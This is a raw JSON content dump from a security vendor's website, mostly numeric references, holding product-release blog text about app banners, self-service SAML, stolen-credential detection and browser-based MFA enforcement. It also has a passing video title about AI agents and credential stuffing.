{"sys":147494,"name":509},{"id":508},{"items":147496},[147497],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":147498},{"url":2911},{"items":147500},[147501],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":147502},{"url":1496},{"json":147504,"links":148018},{"nodeType":165,"data":147505,"content":147506},{},[147507,147514,147530,147556,147562,147565,147572,147578,147585,147591,147597,147603,147609,147616,147622,147645,147668,147674,147681,147687,147708,147714,147717,147724,147730,147737,147753,147783,147789,147799,147805,147812,147818,147824,147830,147836,147839,147846,147852,147873,147878,147881,147888,147901,147907,147910,147917,147923,147936,147942,147966,147969,147975,147991,148007,148012],{"nodeType":169,"data":147508,"content":147509},{},[147510],{"nodeType":173,"value":143097,"marks":147511,"data":147513},[147512],{"type":370},{},{"nodeType":178,"data":147515,"content":147516},{},[147517,147520,147527],{"nodeType":173,"value":37,"marks":147518,"data":147519},[],{},{"nodeType":186,"data":147521,"content":147522},{"uri":1297},[147523],{"nodeType":173,"value":77246,"marks":147524,"data":147526},[147525],{"type":194},{},{"nodeType":173,"value":77250,"marks":147528,"data":147529},[],{},{"nodeType":178,"data":147531,"content":147532},{},[147533,147536,147543,147546,147553],{"nodeType":173,"value":143121,"marks":147534,"data":147535},[],{},{"nodeType":186,"data":147537,"content":147538},{"uri":77262},[147539],{"nodeType":173,"value":143128,"marks":147540,"data":147542},[147541],{"type":194},{},{"nodeType":173,"value":77269,"marks":147544,"data":147545},[],{},{"nodeType":186,"data":147547,"content":147548},{"uri":819},[147549],{"nodeType":173,"value":27706,"marks":147550,"data":147552},[147551],{"type":194},{},{"nodeType":173,"value":143143,"marks":147554,"data":147555},[],{},{"nodeType":178,"data":147557,"content":147558},{},[147559],{"nodeType":173,"value":143150,"marks":147560,"data":147561},[],{},{"nodeType":231,"data":147563,"content":147564},{},[],{"nodeType":169,"data":147566,"content":147567},{},[147568],{"nodeType":173,"value":143160,"marks":147569,"data":147571},[147570],{"type":370},{},{"nodeType":178,"data":147573,"content":147574},{},[147575],{"nodeType":173,"value":143168,"marks":147576,"data":147577},[],{},{"nodeType":235,"data":147579,"content":147580},{},[147581],{"nodeType":173,"value":143175,"marks":147582,"data":147584},[147583],{"type":370},{},{"nodeType":178,"data":147586,"content":147587},{},[147588],{"nodeType":173,"value":143183,"marks":147589,"data":147590},[],{},{"nodeType":178,"data":147592,"content":147593},{},[147594],{"nodeType":173,"value":143190,"marks":147595,"data":147596},[],{},{"nodeType":178,"data":147598,"content":147599},{},[147600],{"nodeType":173,"value":143197,"marks":147601,"data":147602},[],{},{"nodeType":178,"data":147604,"content":147605},{},[147606],{"nodeType":173,"value":143204,"marks":147607,"data":147608},[],{},{"nodeType":235,"data":147610,"content":147611},{},[147612],{"nodeType":173,"value":143211,"marks":147613,"data":147615},[147614],{"type":370},{},{"nodeType":178,"data":147617,"content":147618},{},[147619],{"nodeType":173,"value":143219,"marks":147620,"data":147621},[],{},{"nodeType":178,"data":147623,"content":147624},{},[147625,147628,147632,147635,147642],{"nodeType":173,"value":143226,"marks":147626,"data":147627},[],{},{"nodeType":173,"value":143230,"marks":147629,"data":147631},[147630],{"type":370},{},{"nodeType":173,"value":143235,"marks":147633,"data":147634},[],{},{"nodeType":186,"data":147636,"content":147637},{"uri":143240},[147638],{"nodeType":173,"value":143243,"marks":147639,"data":147641},[147640],{"type":194},{},{"nodeType":173,"value":143248,"marks":147643,"data":147644},[],{},{"nodeType":178,"data":147646,"content":147647},{},[147648,147651,147658,147661,147665],{"nodeType":173,"value":143255,"marks":147649,"data":147650},[],{},{"nodeType":186,"data":147652,"content":147653},{"uri":62639},[147654],{"nodeType":173,"value":143262,"marks":147655,"data":147657},[147656],{"type":194},{},{"nodeType":173,"value":143267,"marks":147659,"data":147660},[],{},{"nodeType":173,"value":143271,"marks":147662,"data":147664},[147663],{"type":370},{},{"nodeType":173,"value":10557,"marks":147666,"data":147667},[],{},{"nodeType":178,"data":147669,"content":147670},{},[147671],{"nodeType":173,"value":143282,"marks":147672,"data":147673},[],{},{"nodeType":235,"data":147675,"content":147676},{},[147677],{"nodeType":173,"value":143289,"marks":147678,"data":147680},[147679],{"type":370},{},{"nodeType":178,"data":147682,"content":147683},{},[147684],{"nodeType":173,"value":143297,"marks":147685,"data":147686},[],{},{"nodeType":250,"data":147688,"content":147689},{},[147690,147699],{"nodeType":254,"data":147691,"content":147692},{},[147693],{"nodeType":178,"data":147694,"content":147695},{},[147696],{"nodeType":173,"value":143310,"marks":147697,"data":147698},[],{},{"nodeType":254,"data":147700,"content":147701},{},[147702],{"nodeType":178,"data":147703,"content":147704},{},[147705],{"nodeType":173,"value":143320,"marks":147706,"data":147707},[],{},{"nodeType":178,"data":147709,"content":147710},{},[147711],{"nodeType":173,"value":143327,"marks":147712,"data":147713},[],{},{"nodeType":231,"data":147715,"content":147716},{},[],{"nodeType":169,"data":147718,"content":147719},{},[147720],{"nodeType":173,"value":143337,"marks":147721,"data":147723},[147722],{"type":370},{},{"nodeType":178,"data":147725,"content":147726},{},[147727],{"nodeType":173,"value":143345,"marks":147728,"data":147729},[],{},{"nodeType":235,"data":147731,"content":147732},{},[147733],{"nodeType":173,"value":143352,"marks":147734,"data":147736},[147735],{"type":370},{},{"nodeType":178,"data":147738,"content":147739},{},[147740,147743,147750],{"nodeType":173,"value":143360,"marks":147741,"data":147742},[],{},{"nodeType":186,"data":147744,"content":147745},{"uri":4492},[147746],{"nodeType":173,"value":143367,"marks":147747,"data":147749},[147748],{"type":194},{},{"nodeType":173,"value":143372,"marks":147751,"data":147752},[],{},{"nodeType":250,"data":147754,"content":147755},{},[147756,147765,147774],{"nodeType":254,"data":147757,"content":147758},{},[147759],{"nodeType":178,"data":147760,"content":147761},{},[147762],{"nodeType":173,"value":143385,"marks":147763,"data":147764},[],{},{"nodeType":254,"data":147766,"content":147767},{},[147768],{"nodeType":178,"data":147769,"content":147770},{},[147771],{"nodeType":173,"value":143395,"marks":147772,"data":147773},[],{},{"nodeType":254,"data":147775,"content":147776},{},[147777],{"nodeType":178,"data":147778,"content":147779},{},[147780],{"nodeType":173,"value":143405,"marks":147781,"data":147782},[],{},{"nodeType":178,"data":147784,"content":147785},{},[147786],{"nodeType":173,"value":143412,"marks":147787,"data":147788},[],{},{"nodeType":178,"data":147790,"content":147791},{},[147792,147796],{"nodeType":173,"value":143419,"marks":147793,"data":147795},[147794],{"type":370},{},{"nodeType":173,"value":143424,"marks":147797,"data":147798},[],{},{"nodeType":178,"data":147800,"content":147801},{},[147802],{"nodeType":173,"value":143431,"marks":147803,"data":147804},[],{},{"nodeType":235,"data":147806,"content":147807},{},[147808],{"nodeType":173,"value":143438,"marks":147809,"data":147811},[147810],{"type":370},{},{"nodeType":178,"data":147813,"content":147814},{},[147815],{"nodeType":173,"value":143446,"marks":147816,"data":147817},[],{},{"nodeType":178,"data":147819,"content":147820},{},[147821],{"nodeType":173,"value":143453,"marks":147822,"data":147823},[],{},{"nodeType":178,"data":147825,"content":147826},{},[147827],{"nodeType":173,"value":143460,"marks":147828,"data":147829},[],{},{"nodeType":178,"data":147831,"content":147832},{},[147833],{"nodeType":173,"value":143467,"marks":147834,"data":147835},[],{},{"nodeType":231,"data":147837,"content":147838},{},[],{"nodeType":169,"data":147840,"content":147841},{},[147842],{"nodeType":173,"value":143477,"marks":147843,"data":147845},[147844],{"type":370},{},{"nodeType":178,"data":147847,"content":147848},{},[147849],{"nodeType":173,"value":143485,"marks":147850,"data":147851},[],{},{"nodeType":250,"data":147853,"content":147854},{},[147855,147864],{"nodeType":254,"data":147856,"content":147857},{},[147858],{"nodeType":178,"data":147859,"content":147860},{},[147861],{"nodeType":173,"value":143498,"marks":147862,"data":147863},[],{},{"nodeType":254,"data":147865,"content":147866},{},[147867],{"nodeType":178,"data":147868,"content":147869},{},[147870],{"nodeType":173,"value":143508,"marks":147871,"data":147872},[],{},{"nodeType":312,"data":147874,"content":147877},{"target":147875},{"sys":147876},{"id":143515,"type":317,"linkType":318},[],{"nodeType":231,"data":147879,"content":147880},{},[],{"nodeType":169,"data":147882,"content":147883},{},[147884],{"nodeType":173,"value":143524,"marks":147885,"data":147887},[147886],{"type":370},{},{"nodeType":178,"data":147889,"content":147890},{},[147891,147894,147898],{"nodeType":173,"value":143532,"marks":147892,"data":147893},[],{},{"nodeType":173,"value":143536,"marks":147895,"data":147897},[147896],{"type":370},{},{"nodeType":173,"value":143541,"marks":147899,"data":147900},[],{},{"nodeType":178,"data":147902,"content":147903},{},[147904],{"nodeType":173,"value":143548,"marks":147905,"data":147906},[],{},{"nodeType":231,"data":147908,"content":147909},{},[],{"nodeType":169,"data":147911,"content":147912},{},[147913],{"nodeType":173,"value":143558,"marks":147914,"data":147916},[147915],{"type":370},{},{"nodeType":178,"data":147918,"content":147919},{},[147920],{"nodeType":173,"value":143566,"marks":147921,"data":147922},[],{},{"nodeType":178,"data":147924,"content":147925},{},[147926,147929,147933],{"nodeType":173,"value":143573,"marks":147927,"data":147928},[],{},{"nodeType":173,"value":143577,"marks":147930,"data":147932},[147931],{"type":1646},{},{"nodeType":173,"value":143582,"marks":147934,"data":147935},[],{},{"nodeType":178,"data":147937,"content":147938},{},[147939],{"nodeType":173,"value":143589,"marks":147940,"data":147941},[],{},{"nodeType":178,"data":147943,"content":147944},{},[147945,147948,147954,147957,147963],{"nodeType":173,"value":143596,"marks":147946,"data":147947},[],{},{"nodeType":186,"data":147949,"content":147950},{"uri":62639},[147951],{"nodeType":173,"value":143603,"marks":147952,"data":147953},[],{},{"nodeType":173,"value":9534,"marks":147955,"data":147956},[],{},{"nodeType":186,"data":147958,"content":147959},{"uri":77513},[147960],{"nodeType":173,"value":143613,"marks":147961,"data":147962},[],{},{"nodeType":173,"value":143617,"marks":147964,"data":147965},[],{},{"nodeType":231,"data":147967,"content":147968},{},[],{"nodeType":169,"data":147970,"content":147971},{},[147972],{"nodeType":173,"value":1422,"marks":147973,"data":147974},[],{},{"nodeType":178,"data":147976,"content":147977},{},[147978,147981,147988],{"nodeType":173,"value":143633,"marks":147979,"data":147980},[],{},{"nodeType":186,"data":147982,"content":147983},{"uri":1469},[147984],{"nodeType":173,"value":88194,"marks":147985,"data":147987},[147986],{"type":194},{},{"nodeType":173,"value":1477,"marks":147989,"data":147990},[],{},{"nodeType":178,"data":147992,"content":147993},{},[147994,147997,148004],{"nodeType":173,"value":143650,"marks":147995,"data":147996},[],{},{"nodeType":186,"data":147998,"content":147999},{"uri":142999},[148000],{"nodeType":173,"value":143657,"marks":148001,"data":148003},[148002],{"type":194},{},{"nodeType":173,"value":37,"marks":148005,"data":148006},[],{},{"nodeType":312,"data":148008,"content":148011},{"target":148009},{"sys":148010},{"id":138798,"type":317,"linkType":318},[],{"nodeType":178,"data":148013,"content":148014},{},[148015],{"nodeType":173,"value":37,"marks":148016,"data":148017},[],{},{"entries":148019},{"hyperlink":148020,"inline":148021,"block":148022},[],[],[148023,148029],{"sys":148024,"__typename":127689,"title":148025,"youTubeUrl":148026,"imagePlaceholder":148027},{"id":143515},"Using Operator to conduct credential stuffing attacks at scale","https://www.youtube.com/watch?v=a_YJafxPjMo",{"url":148028,"width":121106,"height":49163},"https://images.ctfassets.net/y1cdw1ablpvd/47KUHgOYv3FHVkGUbwA3Ly/ab5d478e6b5b1fff84248a05b6d3ccaf/Operator_clip_thumbnail__3_.jpg",{"sys":148030,"__typename":15269,"type":15270,"ctaText":142997,"buttonLabel":142998,"buttonColour":72847,"buttonUrl":142999},{"id":138798},"content:blog:how-new-ai-agents-will-transform-credential-stuffing-attacks.json","blog/how-new-ai-agents-will-transform-credential-stuffing-attacks.json","blog/how-new-ai-agents-will-transform-credential-stuffing-attacks",{"_path":148035,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":148036,"ogImage":118,"summary":148038,"title":83751,"subtitle":118,"metaTitle":148049,"synopsis":83752,"hashTags":118,"publishedDate":83753,"slug":83754,"tagsCollection":148050,"authorsCollection":148054,"content":148058,"relatedBlogPostsCollection":148528,"_id":148934,"_type":5439,"_source":5440,"_file":148935,"_stem":148936,"_extension":5439},"/blog/product-release-march-2025",{"id":83266,"publishedAt":148037},"2025-03-12T14:31:28.590Z",{"json":148039},{"data":148040,"content":148041,"nodeType":165},{},[148042],{"data":148043,"content":148044,"nodeType":178},{},[148045],{"data":148046,"marks":148047,"value":148048,"nodeType":173},{},[],"Add app banners to custom URLs, self-service SAML, and more","Push Security new product features for March 2025",{"items":148051},[148052],{"sys":148053,"name":18399},{"id":18398},{"items":148055},[148056],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":148057},{"url":19129},{"json":148059,"links":148488},{"data":148060,"content":148061,"nodeType":165},{},[148062,148068,148116,148122,148135,148141,148201,148206,148223,148229,148242,148255,148260,148266,148283,148289,148302,148315,148321,148338,148344,148364,148370,148385,148391,148404,148438,148477,148482],{"data":148063,"content":148064,"nodeType":169},{},[148065],{"data":148066,"marks":148067,"value":18415,"nodeType":173},{},[],{"data":148069,"content":148070,"nodeType":250},{},[148071,148080,148089,148098,148107],{"data":148072,"content":148073,"nodeType":254},{},[148074],{"data":148075,"content":148076,"nodeType":178},{},[148077],{"data":148078,"marks":148079,"value":83289,"nodeType":173},{},[],{"data":148081,"content":148082,"nodeType":254},{},[148083],{"data":148084,"content":148085,"nodeType":178},{},[148086],{"data":148087,"marks":148088,"value":83299,"nodeType":173},{},[],{"data":148090,"content":148091,"nodeType":254},{},[148092],{"data":148093,"content":148094,"nodeType":178},{},[148095],{"data":148096,"marks":148097,"value":83309,"nodeType":173},{},[],{"data":148099,"content":148100,"nodeType":254},{},[148101],{"data":148102,"content":148103,"nodeType":178},{},[148104],{"data":148105,"marks":148106,"value":83319,"nodeType":173},{},[],{"data":148108,"content":148109,"nodeType":254},{},[148110],{"data":148111,"content":148112,"nodeType":178},{},[148113],{"data":148114,"marks":148115,"value":83329,"nodeType":173},{},[],{"data":148117,"content":148118,"nodeType":169},{},[148119],{"data":148120,"marks":148121,"value":83289,"nodeType":173},{},[],{"data":148123,"content":148124,"nodeType":178},{},[148125,148128,148132],{"data":148126,"marks":148127,"value":65284,"nodeType":173},{},[],{"data":148129,"marks":148130,"value":83346,"nodeType":173},{},[148131],{"type":370},{"data":148133,"marks":148134,"value":83350,"nodeType":173},{},[],{"data":148136,"content":148137,"nodeType":178},{},[148138],{"data":148139,"marks":148140,"value":83357,"nodeType":173},{},[],{"data":148142,"content":148143,"nodeType":250},{},[148144,148160,148176,148192],{"data":148145,"content":148146,"nodeType":254},{},[148147],{"data":148148,"content":148149,"nodeType":178},{},[148150,148153,148157],{"data":148151,"marks":148152,"value":83370,"nodeType":173},{},[],{"data":148154,"marks":148155,"value":83375,"nodeType":173},{},[148156],{"type":370},{"data":148158,"marks":148159,"value":83379,"nodeType":173},{},[],{"data":148161,"content":148162,"nodeType":254},{},[148163],{"data":148164,"content":148165,"nodeType":178},{},[148166,148169,148173],{"data":148167,"marks":148168,"value":83389,"nodeType":173},{},[],{"data":148170,"marks":148171,"value":83394,"nodeType":173},{},[148172],{"type":370},{"data":148174,"marks":148175,"value":1477,"nodeType":173},{},[],{"data":148177,"content":148178,"nodeType":254},{},[148179],{"data":148180,"content":148181,"nodeType":178},{},[148182,148185,148189],{"data":148183,"marks":148184,"value":83407,"nodeType":173},{},[],{"data":148186,"marks":148187,"value":83412,"nodeType":173},{},[148188],{"type":370},{"data":148190,"marks":148191,"value":83416,"nodeType":173},{},[],{"data":148193,"content":148194,"nodeType":254},{},[148195],{"data":148196,"content":148197,"nodeType":178},{},[148198],{"data":148199,"marks":148200,"value":83426,"nodeType":173},{},[],{"data":148202,"content":148205,"nodeType":312},{"target":148203},{"sys":148204},{"id":83431,"type":317,"linkType":318},[],{"data":148207,"content":148208,"nodeType":178},{},[148209,148212,148220],{"data":148210,"marks":148211,"value":37,"nodeType":173},{},[],{"data":148213,"content":148216,"nodeType":1698},{"target":148214},{"sys":148215},{"id":83443,"type":317,"linkType":318},[148217],{"data":148218,"marks":148219,"value":18605,"nodeType":173},{},[],{"data":148221,"marks":148222,"value":37,"nodeType":173},{},[],{"data":148224,"content":148225,"nodeType":169},{},[148226],{"data":148227,"marks":148228,"value":83457,"nodeType":173},{},[],{"data":148230,"content":148231,"nodeType":178},{},[148232,148235,148239],{"data":148233,"marks":148234,"value":83464,"nodeType":173},{},[],{"data":148236,"marks":148237,"value":83469,"nodeType":173},{},[148238],{"type":370},{"data":148240,"marks":148241,"value":83473,"nodeType":173},{},[],{"data":148243,"content":148244,"nodeType":178},{},[148245,148248,148252],{"data":148246,"marks":148247,"value":83480,"nodeType":173},{},[],{"data":148249,"marks":148250,"value":2789,"nodeType":173},{},[148251],{"type":370},{"data":148253,"marks":148254,"value":83488,"nodeType":173},{},[],{"data":148256,"content":148259,"nodeType":312},{"target":148257},{"sys":148258},{"id":83493,"type":317,"linkType":318},[],{"data":148261,"content":148262,"nodeType":178},{},[148263],{"data":148264,"marks":148265,"value":83501,"nodeType":173},{},[],{"data":148267,"content":148268,"nodeType":178},{},[148269,148272,148280],{"data":148270,"marks":148271,"value":37,"nodeType":173},{},[],{"data":148273,"content":148276,"nodeType":1698},{"target":148274},{"sys":148275},{"id":83512,"type":317,"linkType":318},[148277],{"data":148278,"marks":148279,"value":18605,"nodeType":173},{},[],{"data":148281,"marks":148282,"value":37,"nodeType":173},{},[],{"data":148284,"content":148285,"nodeType":169},{},[148286],{"data":148287,"marks":148288,"value":83526,"nodeType":173},{},[],{"data":148290,"content":148291,"nodeType":178},{},[148292,148295,148299],{"data":148293,"marks":148294,"value":65284,"nodeType":173},{},[],{"data":148296,"marks":148297,"value":83537,"nodeType":173},{},[148298],{"type":370},{"data":148300,"marks":148301,"value":83541,"nodeType":173},{},[],{"data":148303,"content":148304,"nodeType":178},{},[148305,148308,148312],{"data":148306,"marks":148307,"value":83548,"nodeType":173},{},[],{"data":148309,"marks":148310,"value":83553,"nodeType":173},{},[148311],{"type":370},{"data":148313,"marks":148314,"value":1477,"nodeType":173},{},[],{"data":148316,"content":148317,"nodeType":178},{},[148318],{"data":148319,"marks":148320,"value":83563,"nodeType":173},{},[],{"data":148322,"content":148323,"nodeType":178},{},[148324,148327,148335],{"data":148325,"marks":148326,"value":37,"nodeType":173},{},[],{"data":148328,"content":148331,"nodeType":1698},{"target":148329},{"sys":148330},{"id":83574,"type":317,"linkType":318},[148332],{"data":148333,"marks":148334,"value":18605,"nodeType":173},{},[],{"data":148336,"marks":148337,"value":37,"nodeType":173},{},[],{"data":148339,"content":148340,"nodeType":169},{},[148341],{"data":148342,"marks":148343,"value":83588,"nodeType":173},{},[],{"data":148345,"content":148346,"nodeType":178},{},[148347,148350,148354,148357,148361],{"data":148348,"marks":148349,"value":83595,"nodeType":173},{},[],{"data":148351,"marks":148352,"value":83600,"nodeType":173},{},[148353],{"type":370},{"data":148355,"marks":148356,"value":83604,"nodeType":173},{},[],{"data":148358,"marks":148359,"value":83609,"nodeType":173},{},[148360],{"type":370},{"data":148362,"marks":148363,"value":2340,"nodeType":173},{},[],{"data":148365,"content":148366,"nodeType":178},{},[148367],{"data":148368,"marks":148369,"value":83619,"nodeType":173},{},[],{"data":148371,"content":148372,"nodeType":178},{},[148373,148376,148382],{"data":148374,"marks":148375,"value":37,"nodeType":173},{},[],{"data":148377,"content":148378,"nodeType":186},{"uri":83628},[148379],{"data":148380,"marks":148381,"value":18605,"nodeType":173},{},[],{"data":148383,"marks":148384,"value":37,"nodeType":173},{},[],{"data":148386,"content":148387,"nodeType":169},{},[148388],{"data":148389,"marks":148390,"value":83329,"nodeType":173},{},[],{"data":148392,"content":148393,"nodeType":178},{},[148394,148397,148401],{"data":148395,"marks":148396,"value":83648,"nodeType":173},{},[],{"data":148398,"marks":148399,"value":83653,"nodeType":173},{},[148400],{"type":370},{"data":148402,"marks":148403,"value":83657,"nodeType":173},{},[],{"data":148405,"content":148406,"nodeType":178},{},[148407,148410,148414,148417,148421,148424,148428,148431,148435],{"data":148408,"marks":148409,"value":83664,"nodeType":173},{},[],{"data":148411,"marks":148412,"value":83669,"nodeType":173},{},[148413],{"type":370},{"data":148415,"marks":148416,"value":2936,"nodeType":173},{},[],{"data":148418,"marks":148419,"value":71552,"nodeType":173},{},[148420],{"type":370},{"data":148422,"marks":148423,"value":2936,"nodeType":173},{},[],{"data":148425,"marks":148426,"value":71581,"nodeType":173},{},[148427],{"type":370},{"data":148429,"marks":148430,"value":9534,"nodeType":173},{},[],{"data":148432,"marks":148433,"value":83691,"nodeType":173},{},[148434],{"type":370},{"data":148436,"marks":148437,"value":83695,"nodeType":173},{},[],{"data":148439,"content":148440,"nodeType":250},{},[148441,148450,148459,148468],{"data":148442,"content":148443,"nodeType":254},{},[148444],{"data":148445,"content":148446,"nodeType":178},{},[148447],{"data":148448,"marks":148449,"value":83708,"nodeType":173},{},[],{"data":148451,"content":148452,"nodeType":254},{},[148453],{"data":148454,"content":148455,"nodeType":178},{},[148456],{"data":148457,"marks":148458,"value":83718,"nodeType":173},{},[],{"data":148460,"content":148461,"nodeType":254},{},[148462],{"data":148463,"content":148464,"nodeType":178},{},[148465],{"data":148466,"marks":148467,"value":83728,"nodeType":173},{},[],{"data":148469,"content":148470,"nodeType":254},{},[148471],{"data":148472,"content":148473,"nodeType":178},{},[148474],{"data":148475,"marks":148476,"value":83738,"nodeType":173},{},[],{"data":148478,"content":148481,"nodeType":312},{"target":148479},{"sys":148480},{"id":83743,"type":317,"linkType":318},[],{"data":148483,"content":148484,"nodeType":178},{},[148485],{"data":148486,"marks":148487,"value":37,"nodeType":173},{},[],{"entries":148489},{"inline":148490,"hyperlink":148491,"block":148508},[],[148492,148497,148502],{"sys":148493,"__typename":6655,"title":148494,"slug":148495,"articleId":148496},{"id":83443},"How to create a rule for app banners","how-to-create-a-configuration-rule-for-app-banners",10125,{"sys":148498,"__typename":6655,"title":148499,"slug":148500,"articleId":148501},{"id":83512},"Does the Push admin console support SAML login?","does-the-push-admin-console-support-saml-login",10123,{"sys":148503,"__typename":66743,"title":148504,"slug":148505,"audience":66746,"linkedFromParent":148506},{"id":83574},"Managed deployment with Island","managed-deployment-with-island",{"slug":148507},"install-the-browser-extension",[148509,148515,148521],{"sys":148510,"__typename":5345,"title":148511,"caption":118,"layoutMode":118,"file":148512},{"id":83431},"URL patterns - release notes - app banner example",{"url":148513,"width":148514,"height":27942},"https://images.ctfassets.net/y1cdw1ablpvd/70271nJ74cjBb75HFbucYe/49197f7b72610184fbf8fa99716a71a6/url_pattern_banner_example_github.png",1212,{"sys":148516,"__typename":5345,"title":148517,"caption":118,"layoutMode":118,"file":148518},{"id":83493},"SAML configuration - Settings page - KB 10123",{"url":148519,"width":148520,"height":96367},"https://images.ctfassets.net/y1cdw1ablpvd/4eV1Lj4F6lHWgnReKc5r4j/b258219c4387d2a5168b75fa2a83be03/saml_config_settings_page.png",1271,{"sys":148522,"__typename":5345,"title":148523,"caption":118,"layoutMode":118,"file":148524},{"id":83743},"Improved filters - release notes - March 2025",{"url":148525,"width":148526,"height":148527},"https://images.ctfassets.net/y1cdw1ablpvd/3pSxsYhmPOGyulCgvKYQbr/0beea438e1da6f787123178d5667147d/new_filters_20250303.png",854,312,{"items":148529},[148530],{"__typename":1528,"sys":148531,"content":148533,"title":148922,"synopsis":148923,"hashTags":118,"publishedDate":148924,"slug":148925,"tagsCollection":148926,"authorsCollection":148930},{"id":148532},"4Q2pQJXxzthIPAb79RtAML",{"json":148534},{"data":148535,"content":148536,"nodeType":165},{},[148537,148543,148586,148593,148609,148625,148645,148651,148674,148693,148699,148713,148729,148734,148756,148774,148780,148796,148820,148853,148871,148877,148892,148899,148906],{"data":148538,"content":148539,"nodeType":169},{},[148540],{"data":148541,"marks":148542,"value":18415,"nodeType":173},{},[],{"data":148544,"content":148545,"nodeType":250},{},[148546,148556,148566,148576],{"data":148547,"content":148548,"nodeType":254},{},[148549],{"data":148550,"content":148551,"nodeType":178},{},[148552],{"data":148553,"marks":148554,"value":148555,"nodeType":173},{},[],"Detect verified stolen credentials without false positives",{"data":148557,"content":148558,"nodeType":254},{},[148559],{"data":148560,"content":148561,"nodeType":178},{},[148562],{"data":148563,"marks":148564,"value":148565,"nodeType":173},{},[],"Enforce MFA directly in the browser",{"data":148567,"content":148568,"nodeType":254},{},[148569],{"data":148570,"content":148571,"nodeType":178},{},[148572],{"data":148573,"marks":148574,"value":148575,"nodeType":173},{},[],"Detect internal apps and request support for unrecognized apps",{"data":148577,"content":148578,"nodeType":254},{},[148579],{"data":148580,"content":148581,"nodeType":178},{},[148582],{"data":148583,"marks":148584,"value":148585,"nodeType":173},{},[],"Managed deployment support for Safari",{"data":148587,"content":148588,"nodeType":169},{},[148589],{"data":148590,"marks":148591,"value":148592,"nodeType":173},{},[],"Cut through false positives and find verified stolen credentials",{"data":148594,"content":148595,"nodeType":178},{},[148596,148600,148605],{"data":148597,"marks":148598,"value":148599,"nodeType":173},{},[],"Push now ",{"data":148601,"marks":148602,"value":148604,"nodeType":173},{},[148603],{"type":370},"flags verified stolen credentials",{"data":148606,"marks":148607,"value":148608,"nodeType":173},{},[]," in use across your workforce identities by comparing threat intelligence data to fingerprints of passwords actively in use. ",{"data":148610,"content":148611,"nodeType":178},{},[148612,148616,148621],{"data":148613,"marks":148614,"value":148615,"nodeType":173},{},[],"This comparison allows us to ",{"data":148617,"marks":148618,"value":148620,"nodeType":173},{},[148619],{"type":370},"discard all false positives",{"data":148622,"marks":148623,"value":148624,"nodeType":173},{},[]," from the TI sources, leaving you just with the verified true positives. ",{"data":148626,"content":148627,"nodeType":178},{},[148628,148632,148641],{"data":148629,"marks":148630,"value":148631,"nodeType":173},{},[],"With the rise in identity attacks stemming from ",{"data":148633,"content":148637,"nodeType":1698},{"target":148634},{"sys":148635},{"id":148636,"type":317,"linkType":318},"4OrixXXLxRmSDxa7PF9gfM",[148638],{"data":148639,"marks":148640,"value":24636,"nodeType":173},{},[],{"data":148642,"marks":148643,"value":148644,"nodeType":173},{},[],", we’re especially excited to get this feature into your hands to provide a reliable and high-fidelity source of information about which accounts are at critical risk of account takeover.",{"data":148646,"content":148650,"nodeType":312},{"target":148647},{"sys":148648},{"id":148649,"type":317,"linkType":318},"150dE4aTzofOwFXJCtGkJF",[],{"data":148652,"content":148653,"nodeType":178},{},[148654,148657,148662,148666,148670],{"data":148655,"marks":148656,"value":18635,"nodeType":173},{},[],{"data":148658,"marks":148659,"value":148661,"nodeType":173},{},[148660],{"type":370},"Stolen credential detection",{"data":148663,"marks":148664,"value":148665,"nodeType":173},{},[]," on the ",{"data":148667,"marks":148668,"value":18649,"nodeType":173},{},[148669],{"type":370},{"data":148671,"marks":148672,"value":148673,"nodeType":173},{},[]," page of the Push admin console. Get alerted to findings via ChatOps notification, webhook event, or in the UI.",{"data":148675,"content":148676,"nodeType":178},{},[148677,148681,148690],{"data":148678,"marks":148679,"value":148680,"nodeType":173},{},[],"To learn more about how we securely compare stolen cred reports to your employee credentials, check out our ",{"data":148682,"content":148685,"nodeType":1698},{"target":148683},{"sys":148684},{"id":24713,"type":317,"linkType":318},[148686],{"data":148687,"marks":148688,"value":148689,"nodeType":173},{},[],"blog post",{"data":148691,"marks":148692,"value":1477,"nodeType":173},{},[],{"data":148694,"content":148695,"nodeType":169},{},[148696],{"data":148697,"marks":148698,"value":148565,"nodeType":173},{},[],{"data":148700,"content":148701,"nodeType":178},{},[148702,148706,148710],{"data":148703,"marks":148704,"value":148705,"nodeType":173},{},[],"You can now use Push to prompt employees to register for MFA using our new ",{"data":148707,"marks":148708,"value":2570,"nodeType":173},{},[148709],{"type":370},{"data":148711,"marks":148712,"value":19294,"nodeType":173},{},[],{"data":148714,"content":148715,"nodeType":178},{},[148716,148720,148725],{"data":148717,"marks":148718,"value":148719,"nodeType":173},{},[],"End-users will see a banner in their browser ",{"data":148721,"marks":148722,"value":148724,"nodeType":173},{},[148723],{"type":370},"when they use accounts that lack MFA protection",{"data":148726,"marks":148727,"value":148728,"nodeType":173},{},[],". As an administrator, you can select which apps you want to enforce MFA on, including apps not on SSO — or unmanaged apps you don’t even know about.",{"data":148730,"content":148733,"nodeType":312},{"target":148731},{"sys":148732},{"id":24808,"type":317,"linkType":318},[],{"data":148735,"content":148736,"nodeType":178},{},[148737,148741,148745,148748,148752],{"data":148738,"marks":148739,"value":148740,"nodeType":173},{},[],"You can configure ",{"data":148742,"marks":148743,"value":2570,"nodeType":173},{},[148744],{"type":370},{"data":148746,"marks":148747,"value":148665,"nodeType":173},{},[],{"data":148749,"marks":148750,"value":18649,"nodeType":173},{},[148751],{"type":370},{"data":148753,"marks":148754,"value":148755,"nodeType":173},{},[]," page of the admin console.",{"data":148757,"content":148758,"nodeType":178},{},[148759,148762,148771],{"data":148760,"marks":148761,"value":37,"nodeType":173},{},[],{"data":148763,"content":148766,"nodeType":1698},{"target":148764},{"sys":148765},{"id":2429,"type":317,"linkType":318},[148767],{"data":148768,"marks":148769,"value":148770,"nodeType":173},{},[],"See how it works",{"data":148772,"marks":148773,"value":37,"nodeType":173},{},[],{"data":148775,"content":148776,"nodeType":169},{},[148777],{"data":148778,"marks":148779,"value":148575,"nodeType":173},{},[],{"data":148781,"content":148782,"nodeType":178},{},[148783,148787,148792],{"data":148784,"marks":148785,"value":148786,"nodeType":173},{},[],"Push can now ",{"data":148788,"marks":148789,"value":148791,"nodeType":173},{},[148790],{"type":370},"detect internal corporate apps",{"data":148793,"marks":148794,"value":148795,"nodeType":173},{},[]," on non-publicly-accessible domains, such as apps with a domain of “.internal,” “.intranet,” or “.corp.” 